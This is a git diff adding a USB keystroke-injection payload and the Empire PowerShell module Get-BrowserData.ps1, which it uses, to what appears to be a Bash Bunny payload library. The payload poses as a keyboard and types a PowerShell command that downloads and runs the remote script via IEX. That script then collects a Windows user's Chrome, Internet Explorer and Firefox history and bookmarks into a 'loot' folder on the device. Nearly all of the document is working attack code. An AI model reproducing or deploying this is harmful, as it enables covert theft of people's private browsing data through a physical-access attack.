diff --git a/payloads/library/browserData/payload.txt b/payloads/library/browserData/payload.txt new file mode 100755 index 00000000..8142746c --- /dev/null +++ b/payloads/library/browserData/payload.txt @@ -0,0 +1,37 @@ +exit +#!/bin/bash +# +# Title: BrowserData +# Author: zachstanford +# Version: 0.1 (Tested on Windows 10) +# +# Dumps browser info like history and bookmarks from powershell script +# then saves them in /root/udisk/loot/BrowserData/%ComputerName% +# Credits to this Empire's powershell script: +# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-BrowserData.ps1 + +#script +# Blue...............Running Script +# Purple.............Finished + +# Source bunny_helpers.sh to get environment variable SWITCH_POSITION +source bunny_helpers.sh + +LED R 200 +LOOTDIR=/root/udisk/loot/BrowserData +mkdir -p $LOOTDIR + +ATTACKMODE HID STORAGE +LED B 200 + +# wait 6 seconds for the storage to popup +Q DELAY 6000 +Q GUI r +Q DELAY 100 +Q STRING powershell "$bunny =(gwmi win32_volume -f 'label=''BashBunny''' | Select-Object -ExpandProperty DriveLetter); IEX (New-Object Net.WebClient).downloadstring("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-BrowserData.ps1"); Get-BrowserInformation | Out-File -Append $bunny\loot\BrowserData\$env:computername.txt;" +Q ENTER +Q DELAY 2000 +Q STRING exit +Q ENTER +sync +LED R B 200 \ No newline at end of file diff --git a/payloads/library/powershell scripts/module_source/collection/Get-BrowserData.ps1 b/payloads/library/powershell scripts/module_source/collection/Get-BrowserData.ps1 new file mode 100755 index 00000000..e202f78f --- /dev/null +++ b/payloads/library/powershell scripts/module_source/collection/Get-BrowserData.ps1 @@ -0,0 +1,239 @@ +function Get-BrowserInformation { +<# + .SYNOPSIS + + Dumps Browser Information + Author: @424f424f + License: BSD 3-Clause + Required Dependencies: None + Optional Dependencies: None + + .DESCRIPTION + + Enumerates browser history or bookmarks for a Chrome, Internet Explorer, + and/or Firefox browsers on Windows machines. + + .PARAMETER Browser + + The type of browser to enumerate, 'Chrome', 'IE', 'Firefox' or 'All' + + .PARAMETER Datatype + + Type of data to enumerate, 'History' or 'Bookmarks' + + .PARAMETER UserName + + Specific username to search browser information for. + + .PARAMETER Search + + Term to search for + + .EXAMPLE + + PS C:\> Get-BrowserInformation + + Enumerates browser information for all supported browsers for all current users. + + .EXAMPLE + + PS C:\> Get-BrowserInformation -Browser IE -Datatype Bookmarks -UserName user1 + + Enumerates bookmarks for Internet Explorer for the user 'user1'. + + .EXAMPLE + + PS C:\> Get-BrowserInformation -Browser All -Datatype History -UserName user1 -Search 'github' + + Enumerates bookmarks for Internet Explorer for the user 'user1' and only returns + results matching the search term 'github'. +#> + [CmdletBinding()] + Param + ( + [Parameter(Position = 0)] + [String[]] + [ValidateSet('Chrome','IE','FireFox', 'All')] + $Browser = 'All', + + [Parameter(Position = 1)] + [String[]] + [ValidateSet('History','Bookmarks','All')] + $DataType = 'All', + + [Parameter(Position = 2)] + [String] + $UserName = '', + + [Parameter(Position = 3)] + [String] + $Search = '' + ) + + + + function ConvertFrom-Json20([object] $item){ + #http://stackoverflow.com/a/29689642 + Add-Type -AssemblyName System.Web.Extensions + $ps_js = New-Object System.Web.Script.Serialization.JavaScriptSerializer + return ,$ps_js.DeserializeObject($item) + + } + + function Get-ChromeHistory { + $Path = "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History" + if (-not (Test-Path -Path $Path)) { + Write-Verbose "[!] Could not find Chrome History for username: $UserName" + } + $Regex = '(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?' + $Value = Get-Content -Path "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History"|Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique + $Value | ForEach-Object { + $Key = $_ + if ($Key -match $Search){ + New-Object -TypeName PSObject -Property @{ + User = $UserName + Browser = 'Chrome' + DataType = 'History' + Data = $_ + } + } + } + } + + function Get-ChromeBookmarks { + $Path = "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\Bookmarks" + if (-not (Test-Path -Path $Path)) { + Write-Verbose "[!] Could not find FireFox Bookmarks for username: $UserName" + } else { + $Json = Get-Content $Path + $Output = ConvertFrom-Json20($Json) + $Jsonobject = $Output.roots.bookmark_bar.children + $Jsonobject.url |Sort -Unique | ForEach-Object { + if ($_ -match $Search) { + New-Object -TypeName PSObject -Property @{ + User = $UserName + Browser = 'Firefox' + DataType = 'Bookmark' + Data = $_ + } + } + } + } + } + + function Get-InternetExplorerHistory { + #https://crucialsecurityblog.harris.com/2011/03/14/typedurls-part-1/ + + $Null = New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS + $Paths = Get-ChildItem 'HKU:\' -ErrorAction SilentlyContinue | Where-Object { $_.Name -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } + + ForEach($Path in $Paths) { + + $User = ([System.Security.Principal.SecurityIdentifier] $Path.PSChildName).Translate( [System.Security.Principal.NTAccount]) | Select -ExpandProperty Value + + $Path = $Path | Select-Object -ExpandProperty PSPath + + $UserPath = "$Path\Software\Microsoft\Internet Explorer\TypedURLs" + if (-not (Test-Path -Path $UserPath)) { + Write-Verbose "[!] Could not find IE History for SID: $Path" + } + else { + Get-Item -Path $UserPath -ErrorAction SilentlyContinue | ForEach-Object { + $Key = $_ + $Key.GetValueNames() | ForEach-Object { + $Value = $Key.GetValue($_) + if ($Value -match $Search) { + New-Object -TypeName PSObject -Property @{ + User = $UserName + Browser = 'IE' + DataType = 'History' + Data = $Value + } + } + } + } + } + } + } + + function Get-InternetExplorerBookmarks { + $URLs = Get-ChildItem -Path "$Env:systemdrive\Users\" -Filter "*.url" -Recurse -ErrorAction SilentlyContinue + ForEach ($URL in $URLs) { + if ($URL.FullName -match 'Favorites') { + $User = $URL.FullName.split('\')[2] + Get-Content -Path $URL.FullName | ForEach-Object { + try { + if ($_.StartsWith('URL')) { + # parse the .url body to extract the actual bookmark location + $URL = $_.Substring($_.IndexOf('=') + 1) + + if($URL -match $Search) { + New-Object -TypeName PSObject -Property @{ + User = $User + Browser = 'IE' + DataType = 'Bookmark' + Data = $URL + } + } + } + } + catch { + Write-Verbose "Error parsing url: $_" + } + } + } + } + } + + function Get-FireFoxHistory { + $Path = "$Env:systemdrive\Users\$UserName\AppData\Roaming\Mozilla\Firefox\Profiles\" + if (-not (Test-Path -Path $Path)) { + Write-Verbose "[!] Could not find FireFox History for username: $UserName" + } + else { + $Profiles = Get-ChildItem -Path "$Path\*.default\" -ErrorAction SilentlyContinue + $Regex = '(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?' + $Value = Get-Content $Profiles\places.sqlite | Select-String -Pattern $Regex -AllMatches |Select-Object -ExpandProperty Matches |Sort -Unique + $Value.Value |ForEach-Object { + if ($_ -match $Search) { + ForEach-Object { + New-Object -TypeName PSObject -Property @{ + User = $UserName + Browser = 'Firefox' + DataType = 'History' + Data = $_ + } + } + } + } + } + } + + if (!$UserName) { + $UserName = "$ENV:USERNAME" + } + + if(($Browser -Contains 'All') -or ($Browser -Contains 'Chrome')) { + if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) { + Get-ChromeHistory + } + if (($DataType -Contains 'All') -or ($DataType -Contains 'Bookmarks')) { + Get-ChromeBookmarks + } + } + + if(($Browser -Contains 'All') -or ($Browser -Contains 'IE')) { + if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) { + Get-InternetExplorerHistory + } + if (($DataType -Contains 'All') -or ($DataType -Contains 'Bookmarks')) { + Get-InternetExplorerBookmarks + } + } + + if(($Browser -Contains 'All') -or ($Browser -Contains 'FireFox')) { + if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) { + Get-FireFoxHistory + } + } +} \ No newline at end of file